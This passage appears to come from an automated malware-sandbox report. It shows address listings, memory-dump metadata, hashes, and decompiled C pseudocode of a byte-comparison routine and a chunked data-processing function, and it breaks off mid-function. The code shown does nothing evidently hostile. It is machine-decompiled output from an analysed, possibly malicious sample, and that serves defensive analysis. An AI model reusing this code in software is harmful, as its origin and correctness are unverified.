                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c507cd
                                            0x00c50721
                                            0x00c50723
                                            0x00c5073b
                                            0x00c50743
                                            0x00c50745
                                            0x00c5075d
                                            0x00c50765
                                            0x00c50767
                                            0x00c5077f
                                            0x00c50787
                                            0x00c50789
                                            0x00c50792
                                            0x00c50792
                                            0x00000000
                                            0x00c50789
                                            0x00c50770
                                            0x00c50779
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50779
                                            0x00c5074e
                                            0x00c50757
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50757
                                            0x00c5072c
                                            0x00c50735
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50735
                                            0x00c5068a
                                            0x00c5068c
                                            0x00c506a4
                                            0x00c506ac
                                            0x00c506ae
                                            0x00c506c6
                                            0x00c506ce
                                            0x00c506d0
                                            0x00c506e8
                                            0x00c506f0
                                            0x00c506f2
                                            0x00c506fb
                                            0x00c506fb
                                            0x00000000
                                            0x00c506f2
                                            0x00c506d9
                                            0x00c506e2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c506e2
                                            0x00c506b7
                                            0x00c506c0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c506c0
                                            0x00c50695
                                            0x00c5069e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5069e
                                            0x00c505f3
                                            0x00c505f5
                                            0x00c5060d
                                            0x00c50615
                                            0x00c50617
                                            0x00c5062f
                                            0x00c50637
                                            0x00c50639
                                            0x00c50651
                                            0x00c50659
                                            0x00c5065b
                                            0x00c50664
                                            0x00c50664
                                            0x00000000
                                            0x00c5065b
                                            0x00c50642
                                            0x00c5064b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5064b
                                            0x00c50620
                                            0x00c50629
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50629
                                            0x00c505fe
                                            0x00c50607
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50554
                                            0x00c50558
                                            0x00c5055c
                                            0x00c5055e
                                            0x00c50576
                                            0x00c50576
                                            0x00c5057e
                                            0x00c50580
                                            0x00c50598
                                            0x00c50598
                                            0x00c505a0
                                            0x00c505a2
                                            0x00c505ba
                                            0x00c505ba
                                            0x00c505c2
                                            0x00c505c4
                                            0x00c505cd
                                            0x00c505cd
                                            0x00000000
                                            0x00c505c4
                                            0x00c505a8
                                            0x00c505ab
                                            0x00c505b4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c505b4
                                            0x00c50586
                                            0x00c50589
                                            0x00c50592
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50592
                                            0x00c50564
                                            0x00c50567
                                            0x00c50570
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50570
                                            0x00c4fcd6
                                            0x00c4fcd6
                                            0x00c50ac7

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction ID: a7c4c4cd2b08265d8838c97a7cd6460a7a072f2be31cd633244922ea8c63747c
                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction Fuzzy Hash: 4DC1B8762051A70ADF2D463AC57413EFBA16EA27B232A076DDCB3CB0C5FE10D669D520
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4FCDE, Relevance: .3, Instructions: 331COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C4FCDE(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                                            0x00c4fcde
                                            0x00c4fcde
                                            0x00c4fce4
                                            0x00c4fd5b
                                            0x00c4fd5d
                                            0x00c4fd5f
                                            0x00000000
                                            0x00000000
                                            0x00c4fd65
                                            0x00c4fd6b
                                            0x00c4fdf2
                                            0x00c4fdf4
                                            0x00c4fdf6
                                            0x00000000
                                            0x00000000
                                            0x00c4fdfc
                                            0x00c4fe02
                                            0x00c4fe89
                                            0x00c4fe8b
                                            0x00c4fe8d
                                            0x00000000
                                            0x00000000
                                            0x00c4fe93
                                            0x00c4fe99
                                            0x00c4ff20
                                            0x00c4ff22
                                            0x00c4ff24
                                            0x00000000
                                            0x00000000
                                            0x00c4ff2a
                                            0x00c4ff30
                                            0x00c4ffb7
                                            0x00c4ffb9
                                            0x00c4ffbb
                                            0x00000000
                                            0x00000000
                                            0x00c4ffc7
                                            0x00c5004f
                                            0x00c50051
                                            0x00c50053
                                            0x00000000
                                            0x00000000
                                            0x00c50059
                                            0x00c5005f
                                            0x00c500e6
                                            0x00c500e8
                                            0x00c500ea
                                            0x00c500f8
                                            0x00c500fa
                                            0x00c50107
                                            0x00c50107
                                            0x00c500fa
                                            0x00000000
                                            0x00c500ea
                                            0x00c5006c
                                            0x00c5006e
                                            0x00c50086
                                            0x00c5008e
                                            0x00c50090
                                            0x00c500a8
                                            0x00c500b0
                                            0x00c500b2
                                            0x00c500ca
                                            0x00c500d2
                                            0x00c500d4
                                            0x00c500dd
                                            0x00c500dd
                                            0x00000000
                                            0x00c500d4
                                            0x00c500bb
                                            0x00c500c4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c500c4
                                            0x00c50099
                                            0x00c500a2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c500a2
                                            0x00c50077
                                            0x00c50080
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50080
                                            0x00c4ffd5
                                            0x00c4ffd7
                                            0x00c4ffef
                                            0x00c4fff7
                                            0x00c4fff9
                                            0x00c50011
                                            0x00c50019
                                            0x00c5001b
                                            0x00c50033
                                            0x00c5003b
                                            0x00c5003d
                                            0x00c50046
                                            0x00c50046
                                            0x00000000
                                            0x00c5003d
                                            0x00c50024
                                            0x00c5002d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5002d
                                            0x00c50002
                                            0x00c5000b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5000b
                                            0x00c4ffe0
                                            0x00c4ffe9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4ffe9
                                            0x00c4ff3d
                                            0x00c4ff3f
                                            0x00c4ff57
                                            0x00c4ff5f
                                            0x00c4ff61
                                            0x00c4ff79
                                            0x00c4ff81
                                            0x00c4ff83
                                            0x00c4ff9b
                                            0x00c4ffa3
                                            0x00c4ffa5
                                            0x00c4ffae
                                            0x00c4ffae
                                            0x00000000
                                            0x00c4ffa5
                                            0x00c4ff8c
                                            0x00c4ff95
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4ff95
                                            0x00c4ff6a
                                            0x00c4ff73
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4ff73
                                            0x00c4ff48
                                            0x00c4ff51
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4ff51
                                            0x00c4fea6
                                            0x00c4fea8
                                            0x00c4fec0
                                            0x00c4fec8
                                            0x00c4feca
                                            0x00c4fee2
                                            0x00c4feea
                                            0x00c4feec
                                            0x00c4ff04
                                            0x00c4ff0c
                                            0x00c4ff0e
                                            0x00c4ff17
                                            0x00c4ff17
                                            0x00000000
                                            0x00c4ff0e
                                            0x00c4fef5
                                            0x00c4fefe
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fefe
                                            0x00c4fed3
                                            0x00c4fedc
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fedc
                                            0x00c4feb1
                                            0x00c4feba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4feba
                                            0x00c4fe0f
                                            0x00c4fe11
                                            0x00c4fe29
                                            0x00c4fe31
                                            0x00c4fe33
                                            0x00c4fe4b
                                            0x00c4fe53
                                            0x00c4fe55
                                            0x00c4fe6d
                                            0x00c4fe75
                                            0x00c4fe77
                                            0x00c4fe80
                                            0x00c4fe80
                                            0x00000000
                                            0x00c4fe77
                                            0x00c4fe5e
                                            0x00c4fe67
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fe67
                                            0x00c4fe3c
                                            0x00c4fe45
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fe45
                                            0x00c4fe1a
                                            0x00c4fe23
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fe23
                                            0x00c4fd78
                                            0x00c4fd7a
                                            0x00c4fd92
                                            0x00c4fd9a
                                            0x00c4fd9c
                                            0x00c4fdb4
                                            0x00c4fdbc
                                            0x00c4fdbe
                                            0x00c4fdd6
                                            0x00c4fdde
                                            0x00c4fde0
                                            0x00c4fde9
                                            0x00c4fde9
                                            0x00000000
                                            0x00c4fde0
                                            0x00c4fdc7
                                            0x00c4fdd0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fdd0
                                            0x00c4fda5
                                            0x00c4fdae
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fdae
                                            0x00c4fd83
                                            0x00c4fd8c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fce6
                                            0x00c4fce6
                                            0x00c4fced
                                            0x00c4fcef
                                            0x00c4fd03
                                            0x00c4fd03
                                            0x00c4fd0b
                                            0x00c4fd0d
                                            0x00c4fd21
                                            0x00c4fd21
                                            0x00c4fd29
                                            0x00c4fd2b
                                            0x00c4fd3f
                                            0x00c4fd3f
                                            0x00c4fd47
                                            0x00c4fd49
                                            0x00c4fd52
                                            0x00c4fd52
                                            0x00000000
                                            0x00c4fd49
                                            0x00c4fd31
                                            0x00c4fd34
                                            0x00c4fd3d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fd3d
                                            0x00c4fd13
                                            0x00c4fd16
                                            0x00c4fd1f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fd1f
                                            0x00c4fcf5
                                            0x00c4fcf8
                                            0x00c4fd01
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4fd01
                                            0x00c4fcd6
                                            0x00c4fcd6
                                            0x00c50ac7

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                            • Instruction ID: c5ea9563809707940077bbe8cabcdc4ae7b93af40d0fef2f8944645bfd8b717d
                                            • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                            • Instruction Fuzzy Hash: 49C1B5722051A70ADF2D463AC57413EFAA17AA27B231A077DD8B3CB1D5FE10C669D620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4626D, Relevance: .3, Instructions: 325COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00C4626D(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				signed int _t161;
				intOrPtr _t164;
				signed int _t170;
				signed int _t171;
				signed int _t175;
				signed int _t178;
				void* _t181;
				void* _t188;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t208;
				signed int _t212;
				intOrPtr _t213;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t232;
				void* _t238;
				signed int _t240;
				signed int _t241;
				intOrPtr _t245;
				intOrPtr _t247;
				signed int _t257;
				intOrPtr* _t259;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr _t268;
				void* _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;

				_t216 = __ecx;
				E00C42A7F(__ecx, __edx);
				E00C442D8(__ecx,  *((intOrPtr*)(_t274 + 0x238)));
				_t240 = 0;
				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
					_t238 = 0;
					do {
						_t213 =  *((intOrPtr*)(_t216 + 0x18));
						_t238 = _t238 + 0x4ae4;
						_t240 = _t240 + 1;
						 *((char*)(_t213 + _t238 - 0x13)) = 0;
						 *((char*)(_t213 + _t238 - 0x11)) = 0;
					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
				}
				_t219 = 5;
				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
				E00C4EA80( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
				_t276 = _t274 + 0x18;
				_t263 = 0;
				 *(_t276 + 0x28) = 0;
				_t268 = 0;
				 *((char*)(_t276 + 0x13)) = 0;
				 *((intOrPtr*)(_t276 + 0x18)) = 0;
				 *((char*)(_t276 + 0x12)) = 0;
				while(1) {
					L4:
					_push(0x00400000 - _t263 & 0xfffffff0);
					_push( *((intOrPtr*)(_t216 + 0x20)) + _t263);
					_t161 = E00C3C70F();
					 *(_t276 + 0x2c) = _t161;
					if(_t161 < 0) {
						break;
					}
					_t263 = _t263 + _t161;
					 *(_t276 + 0x20) = _t263;
					if(_t263 != 0) {
						if(_t161 <= 0) {
							goto L56;
						} else {
							if(_t263 >= 0x400) {
								L56:
								while(_t268 < _t263) {
									_t225 = 0;
									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
									 *(_t276 + 0x1c) = 0;
									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
									__eflags = _t170;
									if(_t170 != 0) {
										_t245 =  *((intOrPtr*)(_t276 + 0x18));
										_t273 = 0;
										__eflags = 0;
										do {
											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
											 *(_t276 + 0x28) = _t225;
											__eflags =  *((char*)(_t259 + 0x4ad3));
											 *_t259 = _t216;
											if( *((char*)(_t259 + 0x4ad3)) == 0) {
												E00C3A4AA(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
												_t263 =  *(_t276 + 0x20);
												 *((intOrPtr*)(_t259 + 8)) = 0;
												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
												__eflags = _t170;
												 *((intOrPtr*)(_t259 + 4)) = 0;
												 *(_t259 + 0x4acc) = _t170;
												if(_t170 != 0) {
													 *((char*)(_t259 + 0x4ad0)) = 0;
													 *((char*)(_t259 + 0x14)) = 0;
													 *((char*)(_t259 + 0x2c)) = 0;
													_t225 =  *(_t276 + 0x1c);
													goto L15;
												}
											} else {
												 *(_t259 + 0x4acc) = _t263;
												L15:
												__eflags =  *(_t276 + 0x2c);
												 *((char*)(_t259 + 0x4ad3)) = 0;
												 *(_t259 + 0x4ae0) = _t225;
												__eflags =  *((char*)(_t259 + 0x14));
												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
												if( *((char*)(_t259 + 0x14)) != 0) {
													L20:
													__eflags =  *((char*)(_t276 + 0x13));
													if( *((char*)(_t276 + 0x13)) != 0) {
														L23:
														 *((char*)(_t259 + 0x4ad1)) = 1;
														 *((char*)(_t276 + 0x13)) = 1;
													} else {
														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
															goto L23;
														} else {
															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
														}
													}
													_t273 = _t273 + 0x4ae4;
													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
													_t225 = _t225 + 1;
													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
													_t208 = _t263 - _t245;
													__eflags = _t208;
													 *(_t276 + 0x1c) = _t225;
													if(_t208 < 0) {
														L26:
														__eflags = _t208 - 0x400;
														if(_t208 >= 0x400) {
															goto L27;
														}
													} else {
														__eflags =  *((char*)(_t259 + 0x28));
														if( *((char*)(_t259 + 0x28)) == 0) {
															goto L26;
														}
													}
												} else {
													 *((char*)(_t259 + 0x14)) = 1;
													_push(_t259 + 0x18);
													_push(_t259 + 4);
													_t212 = E00C433D3(_t216);
													__eflags = _t212;
													if(_t212 == 0) {
														L29:
														 *((char*)(_t276 + 0x12)) = 1;
													} else {
														__eflags =  *((char*)(_t259 + 0x29));
														if( *((char*)(_t259 + 0x29)) != 0) {
															L19:
															_t225 =  *(_t276 + 0x1c);
															 *((char*)(_t216 + 0xe662)) = 1;
															goto L20;
														} else {
															__eflags =  *((char*)(_t216 + 0xe662));
															if( *((char*)(_t216 + 0xe662)) == 0) {
																goto L29;
															} else {
																goto L19;
															}
														}
													}
												}
											}
											goto L30;
											L27:
											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
											__eflags = _t225 - _t170;
										} while (_t225 < _t170);
									}
									L30:
									_t226 =  *(_t276 + 0x14);
									_t171 = _t226;
									_t257 = _t171 /  *(_t216 + 0x1c);
									__eflags = _t171 %  *(_t216 + 0x1c);
									if(_t171 %  *(_t216 + 0x1c) != 0) {
										_t257 = _t257 + 1;
										__eflags = _t257;
									}
									_t269 = 0;
									__eflags = _t226;
									if(_t226 != 0) {
										_t247 = 0;
										_t267 = _t276 + 0x34;
										_t195 = _t257 * 0x4ae4;
										__eflags = _t195;
										 *((intOrPtr*)(_t276 + 0x24)) = 0;
										 *(_t276 + 0x30) = _t195;
										do {
											_t232 = _t267;
											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											_t197 =  *(_t276 + 0x14) - _t269;
											_t267 = _t267 + 8;
											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											__eflags = _t257 - _t197;
											if(_t257 < _t197) {
												_t197 = _t257;
											}
											__eflags =  *(_t276 + 0x1c) - 1;
											 *(_t232 + 4) = _t197;
											if( *(_t276 + 0x1c) != 1) {
												E00C4045D( *((intOrPtr*)(_t216 + 0x14)), E00C46CAC, _t232);
											} else {
												E00C466A2(_t216, _t248);
											}
											_t269 = _t269 + _t257;
											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
											__eflags = _t269 -  *(_t276 + 0x14);
										} while (_t269 <  *(_t276 + 0x14));
										_t263 =  *(_t276 + 0x20);
									}
									_t270 =  *(_t276 + 0x1c);
									__eflags = _t270;
									if(_t270 == 0) {
										_t268 =  *((intOrPtr*)(_t276 + 0x18));
										goto L68;
									} else {
										E00C40697( *((intOrPtr*)(_t216 + 0x14)));
										 *(_t276 + 0x14) = 0;
										__eflags = _t270;
										if(_t270 == 0) {
											L52:
											_t175 =  *((intOrPtr*)(_t276 + 0x12));
											goto L53;
										} else {
											_t260 = 0;
											__eflags = 0;
											do {
												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
												__eflags =  *((char*)(_t272 + 0x4ad1));
												if( *((char*)(_t272 + 0x4ad1)) != 0) {
													L47:
													_t178 = E00C46CDB(_t216, _t272);
													__eflags = _t178;
													if(_t178 != 0) {
														goto L48;
													}
												} else {
													_t194 = E00C42E2C(_t216, _t272);
													__eflags = _t194;
